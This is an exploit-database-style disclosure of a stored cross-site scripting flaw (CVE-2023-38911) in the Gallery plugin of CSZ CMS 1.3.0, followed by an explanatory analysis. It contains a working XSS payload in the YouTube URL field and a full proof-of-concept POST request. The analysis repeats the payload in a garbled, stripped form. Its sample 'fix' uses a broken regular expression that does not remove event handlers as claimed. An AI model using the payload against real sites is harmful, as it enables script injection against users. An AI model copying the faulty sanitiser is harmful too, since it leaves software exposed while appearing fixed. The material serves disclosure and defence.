CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

Exploit Author: Daniel González Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-09-04 
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/plugin/gallery/edit/2.

When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.

With the following payload we can achieve the XSS

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:

POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1

gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add


CSZ CMS 1.3.0 Stored Cross-Site Scripting Vulnerability in the Gallery Plugin

Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in CSZ CMS version 1.3.0, specifically within the Gallery plugin. This flaw enables attackers to inject malicious scripts into the application's database, which are then executed whenever users view the affected content. The vulnerability was reported by Daniel González and assigned the CVE identifier CVE-2023-38911.

Understanding the Vulnerability

Stored XSS occurs when malicious code is permanently saved on the server—typically in a database—and later executed in the context of a user’s browser. Unlike reflected XSS, which requires a crafted URL to trigger, stored XSS persists across sessions and can affect multiple users without further interaction.

In CSZ CMS 1.3.0, the Gallery plugin allows administrators to create multimedia galleries, including YouTube video integration. The YouTube URL field is where the vulnerability lies. Although the previous version had XSS issues in the Name field, this was patched in 1.3.0. However, the YouTube URL field remains unvalidated and improperly sanitized.

Exploitation Steps and Proof of Concept

Attackers can exploit this vulnerability by following these steps:

  • Navigate to http://localhost/admin/plugin/gallery/edit/2 after logging into the admin panel.
  • Modify an existing gallery entry.
  • Inject a malicious payload into the YouTube URL field.
  • Submit the form to save the data.

The following payload demonstrates the exploit:



<p title="
">

This payload is designed to trigger a JavaScript alert when the page loads. The <svg/onload=alert(document.domain)> element is particularly effective because SVG tags are often overlooked in input sanitization routines. The onload attribute executes the script as soon as the SVG element is rendered.

HTTP Request Payload Analysis

Below is a real-world proof-of-concept (PoC) request demonstrating how the attack is carried out:


POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1

gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

Key observations:

  • URL Encoding: The payload is encoded using %3C (for <) and %3E (for >), which is standard for form submissions.
  • Form Data: The youtube_url parameter contains the malicious SVG code, which is stored directly in the database.
  • Attack Persistence: Once saved, the script will execute every time the gallery is rendered in the frontend, affecting all visitors.

Impact and Risk Assessment

Impact Level Description
High Stored XSS can lead to session hijacking, credential theft, defacement, and redirection to phishing sites.
Exploitability Low to medium: Requires admin access to inject the payload, but once inserted, it affects all users.
CVSS Score Estimated: 7.2 (High severity, as per CVSS v3.1).

Although the vulnerability requires administrative privileges, it poses a significant risk in environments where multiple users have access to the admin panel or where admin accounts are compromised.

Security Recommendations and Mitigation

To prevent exploitation, developers and administrators must implement the following best practices:

  • Input Sanitization: Validate and sanitize all user inputs, especially those used in rendering HTML.
  • Output Encoding: Use context-aware encoding (e.g., HTML entity encoding) when displaying user-supplied content.
  • Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and unsafe sources.
  • Role-Based Access Control: Limit access to the Gallery plugin to trusted users only.
  • Regular Security Audits: Conduct penetration testing and code reviews to detect such vulnerabilities early.

Code Fix Example

Here is a corrected implementation of the input validation for the YouTube URL field:


function sanitizeYoutubeUrl($url) {
    // Remove any script tags or event handlers
    $url = preg_replace('/]*on[^>]*>/i', '', $url);
    $url = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return $url;
}

Explanation: This function uses regular expressions to strip out any onload, onclick, or similar event attributes from the input. It then applies htmlspecialchars() to encode special characters, ensuring that no HTML or JavaScript is rendered in the browser.

Conclusion

The CVE-2023-38911 vulnerability in CSZ CMS 1.3.0 highlights the importance of consistent security practices across all user input fields—even those seemingly benign, like URL inputs. Even if one field is patched, others may remain vulnerable. Security professionals must remain vigilant and apply defense-in-depth strategies to safeguard web applications.